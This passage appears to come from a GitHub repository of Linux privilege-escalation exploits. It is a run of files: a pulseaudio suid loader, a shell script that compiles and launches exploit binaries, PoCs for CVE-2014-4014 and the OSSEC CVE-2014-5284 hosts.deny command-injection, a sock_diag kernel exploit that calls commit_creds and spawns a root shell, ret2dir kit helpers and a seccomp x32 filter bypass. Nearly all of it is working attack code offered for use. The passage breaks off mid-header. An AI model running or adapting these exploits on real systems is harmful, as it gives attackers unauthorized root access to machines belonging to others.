#include 3 | #include 4 | #include 5 | #include 6 | 7 | #define PULSEAUDIO_PATH "/usr/bin/pulseaudio" 8 | #define PATH_TO_EXPLOIT "/home/spender/exploit.so" 9 | 10 | int main(void) 11 | { 12 | int ret; 13 | struct stat fstat; 14 | 15 | ret = personality(PER_SVR4); 16 | 17 | if (ret == -1) { 18 | fprintf(stderr, "Unable to set personality!\n"); 19 | return 3; 20 | } 21 | 22 | fprintf(stdout, " [+] Personality set to: PER_SVR4\n"); 23 | 24 | if (stat(PULSEAUDIO_PATH, &fstat)) { 25 | fprintf(stderr, "Pulseaudio does not exist!\n"); 26 | return 3; 27 | } 28 | 29 | if (!(fstat.st_mode & S_ISUID) || fstat.st_uid != 0) { 30 | fprintf(stderr, "Pulseaudio is not suid root!\n"); 31 | return 3; 32 | } 33 | 34 | execl(PULSEAUDIO_PATH, PULSEAUDIO_PATH, "--log-level=0", "-L", PATH_TO_EXPLOIT, NULL); 35 | 36 | return 3; 37 | } 38 | -------------------------------------------------------------------------------- /2013/enlightenment/run_nonnull_exploits.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | ./run_null_exploits.sh nonnull 4 | -------------------------------------------------------------------------------- /2013/enlightenment/run_null_exploits.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | GCC=gcc 3 | IS_64=`uname -m` 4 | LINK_FLAG="-ldl" 5 | OPT_FLAG="-fomit-frame-pointer -O2" 6 | if [ "$IS_64" = "x86_64" ]; then 7 | OPT_FLAG="-m64 -fomit-frame-pointer -O2" 8 | fi 9 | if [ "$1" != "" ]; then 10 | OPT_FLAG="$OPT_FLAG -DNON_NULL_ONLY" 11 | elif [ -d /usr/include/selinux ]; then 12 | OPT_FLAG="$OPT_FLAG -DHAVE_SELINUX -lselinux" 13 | fi 14 | 15 | for FILE in exp_*.c; do 16 | printf "Compiling $FILE..." 17 | $GCC -fno-stack-protector -fPIC $OPT_FLAG -shared -o `printf $FILE | cut -d"." -f1`.so $FILE $LINK_FLAG 2> /dev/null 18 | if [ "$?" = "1" ]; then 19 | $GCC -fPIC $OPT_FLAG -shared -o `printf $FILE | cut -d"." -f1`.so $FILE $LINK_FLAG 2> /dev/null 20 | if [ "$?" = "1" ]; then 21 | printf "failed.\n" 22 | else 23 | printf "OK.\n" 24 | fi 25 | else 26 | printf "OK.\n" 27 | fi 28 | done 29 | 30 | ESCAPED_PWD=`pwd | sed 's/\//\\\\\//g'` 31 | MINADDR=`cat /proc/sys/vm/mmap_min_addr 2> /dev/null` 32 | if [ "$1" != "" -o "$MINADDR" = "" -o "$MINADDR" = "0" ]; then 33 | sed "s/\/home\/spender/$ESCAPED_PWD/g" exploit.c > exploit1.c 34 | mv exploit.c exploit2.c 35 | mv exploit1.c exploit.c 36 | $GCC -fno-stack-protector -fno-pie $OPT_FLAG -o exploit exploit.c $LINK_FLAG 2> /dev/null 37 | if [ "$?" = "1" ]; then 38 | $GCC -fno-stack-protector $OPT_FLAG -o exploit exploit.c $LINK_FLAG 2> /dev/null 39 | fi 40 | if [ "$?" = "1" ]; then 41 | $GCC $OPT_FLAG -o exploit exploit.c $LINK_FLAG 2> /dev/null 42 | fi 43 | mv -f exploit2.c exploit.c 44 | ./exploit 45 | elif [ ! -f '/selinux/enforce' ]; then 46 | killall -9 pulseaudio 2> /dev/null 47 | sed "s/\/home\/spender/$ESCAPED_PWD/g" exploit.c > exploit1.c 48 | mv exploit.c exploit2.c 49 | mv exploit1.c exploit.c 50 | $GCC -fno-stack-protector -fno-pie -fPIC $OPT_FLAG -shared -o exploit.so exploit.c $LINK_FLAG 2> /dev/null 51 | if [ "$?" = "1" ]; then 52 | $GCC -fno-stack-protector -fPIC $OPT_FLAG -shared -o exploit.so exploit.c $LINK_FLAG 2> /dev/null 53 | fi 54 | if [ "$?" = "1" ]; then 55 | $GCC -fPIC $OPT_FLAG -shared -o exploit.so exploit.c $LINK_FLAG 2> /dev/null 56 | fi 57 | mv -f exploit2.c exploit.c 58 | sed "s/\/home\/spender/$ESCAPED_PWD/g" pwnkernel.c > pwnkernel1.c 59 | mv pwnkernel.c pwnkernel2.c 60 | mv pwnkernel1.c pwnkernel.c 61 | $GCC $OPT_FLAG -o pwnkernel pwnkernel.c $LINK_FLAG 62 | mv -f pwnkernel2.c pwnkernel.c 63 | ./pwnkernel 64 | else 65 | sed "s/\/home\/spender/$ESCAPED_PWD/g" exploit.c > exploit1.c 66 | mv exploit.c exploit2.c 67 | mv exploit1.c exploit.c 68 | $GCC -fno-stack-protector -fno-pie $OPT_FLAG -o exploit exploit.c $LINK_FLAG 2> /dev/null 69 | if [ "$?" = "1" ]; then 70 | $GCC -fno-stack-protector $OPT_FLAG -o exploit exploit.c $LINK_FLAG 2> /dev/null 71 | fi 72 | if [ "$?" = "1" ]; then 73 | $GCC $OPT_FLAG -o exploit exploit.c $LINK_FLAG 2> /dev/null 74 | fi 75 | mv -f exploit2.c exploit.c 76 | ./exploit 77 | fi 78 | -------------------------------------------------------------------------------- /2014/1-2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/1-2 -------------------------------------------------------------------------------- /2014/3.4 and up/recvmmsg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/3.4 and up/recvmmsg -------------------------------------------------------------------------------- /2014/3.4 and up/timeoutpwn: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/3.4 and up/timeoutpwn -------------------------------------------------------------------------------- /2014/CVE-2014-4014-setgid.c: -------------------------------------------------------------------------------- 1 | /** 2 | * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC 3 | * 4 | * Vitaly Nikolenko 5 | * http://hashcrack.org 6 | * 7 | * Usage: ./poc [file_path] 8 | * 9 | * where file_path is the file on which you want to set the sgid bit 10 | */ 11 | #define _GNU_SOURCE 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | 22 | #define STACK_SIZE (1024 * 1024) 23 | static char child_stack[STACK_SIZE]; 24 | 25 | struct args { 26 | int pipe_fd[2]; 27 | char *file_path; 28 | }; 29 | 30 | static int child(void *arg) { 31 | struct args *f_args = (struct args *)arg; 32 | char c; 33 | 34 | // close stdout 35 | close(f_args->pipe_fd[1]); 36 | 37 | assert(read(f_args->pipe_fd[0], &c, 1) == 0); 38 | 39 | // set the setgid bit 40 | chmod(f_args->file_path, S_ISGID|S_IRUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXUSR); 41 | 42 | return 0; 43 | } 44 | 45 | int main(int argc, char *argv[]) { 46 | int fd; 47 | pid_t pid; 48 | char mapping[1024]; 49 | char map_file[PATH_MAX]; 50 | struct args f_args; 51 | 52 | assert(argc == 2); 53 | 54 | f_args.file_path = argv[1]; 55 | // create a pipe for synching the child and parent 56 | assert(pipe(f_args.pipe_fd) != -1); 57 | 58 | pid = clone(child, child_stack + STACK_SIZE, CLONE_NEWUSER | SIGCHLD, &f_args); 59 | assert(pid != -1); 60 | 61 | // get the current uid outside the namespace 62 | snprintf(mapping, 1024, "0 %d 1\n", getuid()); 63 | 64 | // update uid and gid maps in the child 65 | snprintf(map_file, PATH_MAX, "/proc/%ld/uid_map", (long) pid); 66 | fd = open(map_file, O_RDWR); assert(fd != -1); 67 | 68 | assert(write(fd, mapping, strlen(mapping)) == strlen(mapping)); 69 | close(f_args.pipe_fd[1]); 70 | 71 | assert (waitpid(pid, NULL, 0) != -1); 72 | } -------------------------------------------------------------------------------- /2014/CVE-2014-5284.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Exploit Title: ossec 2.8 Insecure Temporary File Creation Vulnerability Privilege Escalation 3 | # Date: 14-11-14 4 | # Exploit Author: skynet-13 5 | # Vendor Homepage: www.ossec.net/ 6 | # Software Link: https://github.com/ossec/ossec-hids/archive/2.8.1.tar.gz 7 | # Version: OSSEC - 2.8 8 | # Tested on: Ubunutu x86_64 9 | # CVE : 2014-5284 10 | 11 | # Created from Research by 12 | # Jeff Petersen 13 | # Roka Security LLC 14 | # jpetersen@rokasecurity.com 15 | # Original info at https://github.com/ossec/ossec-hids/releases/tag/2.8.1 16 | 17 | # Run this on target machine and follow instructions to execute command as root 18 | 19 | from twisted.internet import inotify 20 | from twisted.python import filepath 21 | from twisted.internet import reactor 22 | import os 23 | import optparse 24 | import signal 25 | 26 | 27 | class HostDenyExploiter(object): 28 | 29 | def __init__(self, path_to_watch, cmd): 30 | self.path = path_to_watch 31 | self.notifier = inotify.INotify() 32 | self.exploit = cmd 33 | 34 | def create_files(self): 35 | print "==============================================" 36 | print "Creating /tmp/hosts.deny.300 through /tmp/hosts.deny.65536 ..." 37 | 38 | for i in range(300, 65536): 39 | filename = "/tmp/hosts.deny.%s" % i 40 | f = open(filename, 'w') 41 | f.write("") 42 | f.close() 43 | 44 | def watch_files(self): 45 | print "==============================================" 46 | print "Monitoring tmp for file change...." 47 | print "ssh into the system a few times with an incorrect password" 48 | print "Then wait for up to 10 mins" 49 | print "==============================================" 50 | self.notifier.startReading() 51 | self.notifier.watch(filepath.FilePath(self.path), callbacks=[self.on_file_change]) 52 | 53 | def write_exploit_to_file(self, path): 54 | print 'Writing exploit to this file' 55 | f = open(str(path).split("'")[1], 'w') 56 | f.write(' sshd : ALL : twist %s \n' % self.exploit) 57 | f.close() 58 | print "==============================================" 59 | print " ssh in again to execute the command" 60 | print "==============================================" 61 | print " End Prog." 62 | os.kill(os.getpid(), signal.SIGUSR1) 63 | 64 | def on_file_change(self, watch, path, mask): 65 | print 'File: ', str(path).split("'")[1], ' has just been modified' 66 | self.notifier.stopReading() 67 | self.write_exploit_to_file(path) 68 | 69 | 70 | if __name__ == '__main__': 71 | parser = optparse.OptionParser("usage of program \n" + "-c Command to run as root in quotes\n") 72 | parser.add_option('-c', dest='cmd', type='string', help='Used to specify a command to run as root') 73 | (options, args) = parser.parse_args() 74 | cmd = options.cmd 75 | if options.cmd is None: 76 | print parser.usage 77 | exit(0) 78 | ex = HostDenyExploiter('/tmp', cmd) 79 | ex.create_files() 80 | ex.watch_files() 81 | reactor.run() 82 | exit(0) -------------------------------------------------------------------------------- /2014/ekit/include/hdr.txt: -------------------------------------------------------------------------------- 1 | |=-------------------------------------------------------------------------=| 2 | |=------[ Return-to-direct-mapped memory (ret2dir) Exploitation Kit ]------=| 3 | |=-------------------------------------------------------------------------=| 4 | |=-------[ Network Security Lab (NSL) # http://nsl.cs.columbia.edu ]-------=| 5 | |=-------------------------[ Columbia University ]-------------------------=| 6 | |=-------------[ Vasileios P. Kemerlis (vpk@cs.columbia.edu) ]-------------=| 7 | |=-------------------[ http://www.cs.columbia.edu/~vpk ]-------------------=| 8 | |=-------------------------------------------------------------------------=| 9 | -------------------------------------------------------------------------------- /2014/ekit/ret2dir/kernwrite_amd64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/ret2dir/kernwrite_amd64 -------------------------------------------------------------------------------- /2014/ekit/ret2dir/kernwrite_amd64-pax: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/ret2dir/kernwrite_amd64-pax -------------------------------------------------------------------------------- /2014/ekit/ret2dir/perf-events_amd64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/ret2dir/perf-events_amd64 -------------------------------------------------------------------------------- /2014/ekit/ret2dir/rds_amd64-pax: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/ret2dir/rds_amd64-pax -------------------------------------------------------------------------------- /2014/ekit/ret2dir/sock-diag_amd64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/ret2dir/sock-diag_amd64 -------------------------------------------------------------------------------- /2014/ekit/ret2usr/kernwrite_amd64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/ret2usr/kernwrite_amd64 -------------------------------------------------------------------------------- /2014/ekit/ret2usr/perf-events_amd64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/ret2usr/perf-events_amd64 -------------------------------------------------------------------------------- /2014/ekit/ret2usr/rds_amd64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/ret2usr/rds_amd64 -------------------------------------------------------------------------------- /2014/ekit/ret2usr/sock-diag_amd64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/ret2usr/sock-diag_amd64 -------------------------------------------------------------------------------- /2014/ekit/ret2usr/sock-diag_amd64.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | 14 | #define NETLINK_SOCK_DIAG 4 15 | #define SOCK_DIAG_BY_FAMILY 20 16 | #define UDIAG_SHOW_NAME 0x00000001 17 | #define UDIAG_SHOW_PEER 0x00000004 18 | #define UDIAG_SHOW_RQLEN 0x00000010 19 | 20 | struct unix_diag_req { 21 | __u8 sdiag_family; 22 | __u8 sdiag_protocol; 23 | __u16 pad; 24 | __u32 udiag_states; 25 | __u32 udiag_ino; 26 | __u32 udiag_show; 27 | __u32 udiag_cookie[2]; 28 | }; 29 | 30 | 31 | 32 | typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); 33 | typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); 34 | _commit_creds commit_creds; 35 | _prepare_kernel_cred prepare_kernel_cred; 36 | unsigned long sock_diag_handlers, nl_table; 37 | 38 | int __attribute__((regparm(3))) 39 | x() 40 | { 41 | commit_creds(prepare_kernel_cred(0)); 42 | return -1; 43 | } 44 | 45 | char stage1[] = "\xff\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 46 | 47 | int main() { 48 | int fd; 49 | unsigned long mmap_start, mmap_size = 0x10000; 50 | unsigned family; 51 | struct { 52 | struct nlmsghdr nlh; 53 | struct unix_diag_req r; 54 | } req; 55 | char buf[8192]; 56 | 57 | if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){ 58 | printf("Can't create sock diag socket\n"); 59 | return -1; 60 | } 61 | 62 | memset(&req, 0, sizeof(req)); 63 | req.nlh.nlmsg_len = sizeof(req); 64 | req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY; 65 | req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST; 66 | req.nlh.nlmsg_seq = 123456; 67 | 68 | req.r.udiag_states = -1; 69 | req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN; 70 | 71 | /* Ubuntu 12.10 x86_64 */ 72 | req.r.sdiag_family = 0x37; 73 | commit_creds = (_commit_creds) 0xffffffff8107d180; 74 | prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107d410; 75 | mmap_start = 0x1a000; 76 | 77 | if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC, 78 | MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) { 79 | 80 | printf("mmap fault\n"); 81 | exit(1); 82 | } 83 | 84 | *(unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x; 85 | memset((void *)mmap_start, 0x90, mmap_size); 86 | memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1, sizeof(stage1)); 87 | 88 | send(fd, &req, sizeof(req), 0); 89 | if(!getuid()) 90 | system("/bin/sh"); 91 | } 92 | -------------------------------------------------------------------------------- /2014/ekit/utils/kernwrite-pax/Makefile: -------------------------------------------------------------------------------- 1 | obj-m = kernwrite.o 2 | 3 | M=$(shell pwd) 4 | 5 | all: 6 | make -C /lib/modules/$(shell uname -r)/build/ M=$(M) modules 7 | 8 | clean: 9 | rm -rf *.ko *.o *.mod* .*.cmd modules.order Module.symvers .tmp_versions 10 | -------------------------------------------------------------------------------- /2014/ekit/utils/kernwrite-pax/Module.symvers: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/utils/kernwrite-pax/Module.symvers -------------------------------------------------------------------------------- /2014/ekit/utils/kernwrite-pax/VERSION: -------------------------------------------------------------------------------- 1 | 2.718alpha 2 | -------------------------------------------------------------------------------- /2014/ekit/utils/kernwrite-pax/kernwrite.ko: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/utils/kernwrite-pax/kernwrite.ko -------------------------------------------------------------------------------- /2014/ekit/utils/kernwrite-pax/kernwrite.mod.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | MODULE_INFO(vermagic, VERMAGIC_STRING); 6 | 7 | struct module __this_module 8 | __attribute__((section(".gnu.linkonce.this_module"))) = { 9 | .name = KBUILD_MODNAME, 10 | .init = init_module, 11 | #ifdef CONFIG_MODULE_UNLOAD 12 | .exit = cleanup_module, 13 | #endif 14 | .arch = MODULE_ARCH_INIT, 15 | }; 16 | 17 | static const struct modversion_info ____versions[] 18 | __used 19 | __attribute__((section("__versions"))) = { 20 | { 0x67f517d4, "module_layout" }, 21 | { 0x38f6de07, "debugfs_create_file" }, 22 | { 0x15882509, "debugfs_create_dir" }, 23 | { 0xf0fdf6cb, "__stack_chk_fail" }, 24 | { 0xb742fd7, "simple_strtol" }, 25 | { 0x167e7f9d, "__get_user_1" }, 26 | { 0xfb578fc5, "memset" }, 27 | { 0x26948d96, "copy_user_enhanced_fast_string" }, 28 | { 0xafb8c6ff, "copy_user_generic_string" }, 29 | { 0x72a98fdb, "copy_user_generic_unrolled" }, 30 | { 0x4993e8f0, "current_tinfo" }, 31 | { 0x88db9f48, "__check_object_size" }, 32 | { 0xa1c76e0a, "_cond_resched" }, 33 | { 0x27e1a049, "printk" }, 34 | { 0xde2aad88, "debugfs_remove" }, 35 | { 0xbdfb6dbb, "__fentry__" }, 36 | }; 37 | 38 | static const char __module_depends[] 39 | __used 40 | __attribute__((section(".modinfo"))) = 41 | "depends="; 42 | 43 | 44 | MODULE_INFO(srcversion, "C4B85F8A3C757995452A2F6"); 45 | -------------------------------------------------------------------------------- /2014/ekit/utils/kernwrite-pax/kernwrite.mod.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/utils/kernwrite-pax/kernwrite.mod.o -------------------------------------------------------------------------------- /2014/ekit/utils/kernwrite-pax/kernwrite.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/utils/kernwrite-pax/kernwrite.o -------------------------------------------------------------------------------- /2014/ekit/utils/kernwrite-pax/modules.order: -------------------------------------------------------------------------------- 1 | kernel//home/vpk/ret2dir/exploits/kernwrite/kernwrite.ko 2 | -------------------------------------------------------------------------------- /2014/ekit/utils/kernwrite/Makefile: -------------------------------------------------------------------------------- 1 | obj-m = kernwrite.o 2 | 3 | M=$(shell pwd) 4 | 5 | all: 6 | make -C /lib/modules/$(shell uname -r)/build/ M=$(M) modules 7 | 8 | clean: 9 | rm -rf *.ko *.o *.mod* .*.cmd modules.order Module.symvers .tmp_versions 10 | -------------------------------------------------------------------------------- /2014/ekit/utils/kernwrite/Module.symvers: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/utils/kernwrite/Module.symvers -------------------------------------------------------------------------------- /2014/ekit/utils/kernwrite/VERSION: -------------------------------------------------------------------------------- 1 | 2.718alpha 2 | -------------------------------------------------------------------------------- /2014/ekit/utils/kernwrite/kernwrite.ko: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/utils/kernwrite/kernwrite.ko -------------------------------------------------------------------------------- /2014/ekit/utils/kernwrite/kernwrite.mod.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | MODULE_INFO(vermagic, VERMAGIC_STRING); 6 | 7 | struct module __this_module 8 | __attribute__((section(".gnu.linkonce.this_module"))) = { 9 | .name = KBUILD_MODNAME, 10 | .init = init_module, 11 | #ifdef CONFIG_MODULE_UNLOAD 12 | .exit = cleanup_module, 13 | #endif 14 | .arch = MODULE_ARCH_INIT, 15 | }; 16 | 17 | static const struct modversion_info ____versions[] 18 | __used 19 | __attribute__((section("__versions"))) = { 20 | { 0x9a31bb74, "module_layout" }, 21 | { 0xb2815f09, "debugfs_create_file" }, 22 | { 0x26b09686, "debugfs_create_dir" }, 23 | { 0xf0fdf6cb, "__stack_chk_fail" }, 24 | { 0xb742fd7, "simple_strtol" }, 25 | { 0x4f6b400b, "_copy_from_user" }, 26 | { 0xa1c76e0a, "_cond_resched" }, 27 | { 0x27e1a049, "printk" }, 28 | { 0x3dbb1c73, "debugfs_remove" }, 29 | { 0xbdfb6dbb, "__fentry__" }, 30 | }; 31 | 32 | static const char __module_depends[] 33 | __used 34 | __attribute__((section(".modinfo"))) = 35 | "depends="; 36 | 37 | 38 | MODULE_INFO(srcversion, "C4B85F8A3C757995452A2F6"); 39 | -------------------------------------------------------------------------------- /2014/ekit/utils/kernwrite/kernwrite.mod.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/utils/kernwrite/kernwrite.mod.o -------------------------------------------------------------------------------- /2014/ekit/utils/kernwrite/kernwrite.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2014/ekit/utils/kernwrite/kernwrite.o -------------------------------------------------------------------------------- /2014/ekit/utils/kernwrite/modules.order: -------------------------------------------------------------------------------- 1 | kernel//home/vpk/ret2dir/exploits/kernwrite/kernwrite.ko 2 | -------------------------------------------------------------------------------- /2014/ekit/utils/load_kernwrite.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #define INSMOD_PATH "/sbin/insmod" 10 | #define INIT_PRE_CMD "/sbin/rmmod kernwrite > /dev/null 2>&1" 11 | #define INIT_POST_CMD "/bin/chmod go+rx /sys/kernel/debug" 12 | 13 | 14 | /* helper; initialize the `kernwrite' module */ 15 | int 16 | main(int argc, char **argv) 17 | { 18 | /* exit status */ 19 | int status; 20 | 21 | 22 | /* argument validation */ 23 | if (argc <= 1) { 24 | /* failed */ 25 | fprintf(stderr, "[-] %s \n", argv[0]); 26 | goto err; 27 | } 28 | 29 | /* pre initialization */ 30 | if (system(INIT_PRE_CMD) == -1) { 31 | /* failed */ 32 | fprintf(stderr, "[-] system() failed -- %s\n", 33 | strerror(errno)); 34 | goto err; 35 | } 36 | 37 | /* load the module */ 38 | switch (fork()) { 39 | case -1: 40 | /* fork() failed */ 41 | fprintf(stderr, "[-] fork() failed -- %s\n", 42 | strerror(errno)); 43 | goto err; 44 | 45 | /* not reached */ 46 | break; 47 | 48 | case 0: 49 | /* child; `insmod' */ 50 | execlp(INSMOD_PATH, INSMOD_PATH, argv[1], NULL); 51 | 52 | /* failed */ 53 | fprintf(stderr, "[-] exec() failed -- %s\n", 54 | strerror(errno)); 55 | 56 | goto err; 57 | 58 | /* not reached */ 59 | break; 60 | 61 | default: 62 | /* parent; wait for `insmod' to complete */ 63 | wait(&status); 64 | 65 | if (WEXITSTATUS(status) != 0) 66 | /* child failed */ 67 | goto err; 68 | 69 | /* done */ 70 | break; 71 | } 72 | 73 | /* post initialization */ 74 | if (system(INIT_POST_CMD) == -1) { 75 | /* failed */ 76 | fprintf(stderr, "[-] system() failed -- %s\n", 77 | strerror(errno)); 78 | goto err; 79 | } 80 | 81 | /* done; return with success */ 82 | return EXIT_SUCCESS; 83 | 84 | err: 85 | /* done; return with an error */ 86 | return EXIT_FAILURE; 87 | } 88 | -------------------------------------------------------------------------------- /2014/seccomp-exp/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -m64 -o hu hu.c 3 | -------------------------------------------------------------------------------- /2014/seccomp-exp/hu.c: -------------------------------------------------------------------------------- 1 | /* compile with -m64 */ 2 | #include "seccomp-bpf.h" 3 | 4 | static int install_syscall_filter(void) 5 | { 6 | struct sock_filter filter[] = { 7 | VALIDATE_ARCHITECTURE, 8 | EXAMINE_SYSCALL, 9 | DISALLOW_SYSCALL(execve), 10 | CONTINUE_EXEC, 11 | }; 12 | struct sock_fprog prog = { 13 | .len = (unsigned short)(sizeof(filter)/sizeof(filter[0])), 14 | .filter = filter, 15 | }; 16 | 17 | if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog)) { 18 | perror("prctl(SECCOMP)"); 19 | goto failed; 20 | } 21 | return 0; 22 | 23 | failed: 24 | if (errno == EINVAL) 25 | fprintf(stderr, "SECCOMP_FILTER is not available. :(\n"); 26 | return 1; 27 | } 28 | 29 | char *path = "/usr/bin/id"; 30 | char *blah2[] = { "/usr/bin/id", NULL }; 31 | 32 | int main(int argc, char *argv[]) 33 | { 34 | if (install_syscall_filter()) 35 | return 1; 36 | 37 | /* perform X32(not i386) execve */ 38 | asm volatile ( 39 | ".intel_syntax noprefix\n" 40 | "mov rdi, path\n" 41 | "lea rsi, blah2\n" 42 | "xor rdx, rdx\n" 43 | "mov rax, 0x40000208\n" 44 | "syscall\n" 45 | ".att_syntax noprefix\n" 46 | ); 47 | 48 | // execl("/usr/bin/id", "/usr/bin/id", NULL); 49 | 50 | return 0; 51 | } 52 | -------------------------------------------------------------------------------- /2014/seccomp-exp/seccomp-bpf.h: -------------------------------------------------------------------------------- 1 | /* 2 | * seccomp example for x86 (32-bit and 64-bit) with BPF macros 3 | * 4 | * Copyright (c) 2012 The Chromium OS Authors 5 | * Authors: 6 | * Will Drewry 7 | * Kees Cook 8 | * 9 | * Use of this source code is governed by a BSD-style license that can be 10 | * found in the LICENSE file. 11 | */ 12 | #ifndef _SECCOMP_BPF_H_ 13 | #define _SECCOMP_BPF_H_ 14 | 15 | #define _GNU_SOURCE 1 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | 24 | #include 25 | #ifndef PR_SET_NO_NEW_PRIVS 26 | # define PR_SET_NO_NEW_PRIVS 38 27 | #endif 28 | 29 | #include 30 | #include 31 | #include 32 | #ifdef HAVE_LINUX_SECCOMP_H 33 | # include 34 | #endif 35 | #ifndef SECCOMP_MODE_FILTER 36 | # define SECCOMP_MODE_FILTER 2 /* uses user-supplied filter. */ 37 | # define SECCOMP_RET_KILL 0x00000000U /* kill the task immediately */ 38 | # define SECCOMP_RET_TRAP 0x00030000U /* disallow and force a SIGSYS */ 39 | # define SECCOMP_RET_ALLOW 0x7fff0000U /* allow */ 40 | struct seccomp_data { 41 | int nr; 42 | __u32 arch; 43 | __u64 instruction_pointer; 44 | __u64 args[6]; 45 | }; 46 | #endif 47 | #ifndef SYS_SECCOMP 48 | # define SYS_SECCOMP 1 49 | #endif 50 | 51 | #define syscall_nr (offsetof(struct seccomp_data, nr)) 52 | #define arch_nr (offsetof(struct seccomp_data, arch)) 53 | 54 | #if defined(__i386__) 55 | # define REG_SYSCALL REG_EAX 56 | # define ARCH_NR AUDIT_ARCH_I386 57 | #elif defined(__x86_64__) 58 | # define REG_SYSCALL REG_RAX 59 | # define ARCH_NR AUDIT_ARCH_X86_64 60 | #else 61 | # warning "Platform does not support seccomp filter yet" 62 | # define REG_SYSCALL 0 63 | # define ARCH_NR 0 64 | #endif 65 | 66 | #define VALIDATE_ARCHITECTURE \ 67 | BPF_STMT(BPF_LD+BPF_W+BPF_ABS, arch_nr), \ 68 | BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, ARCH_NR, 1, 0), \ 69 | 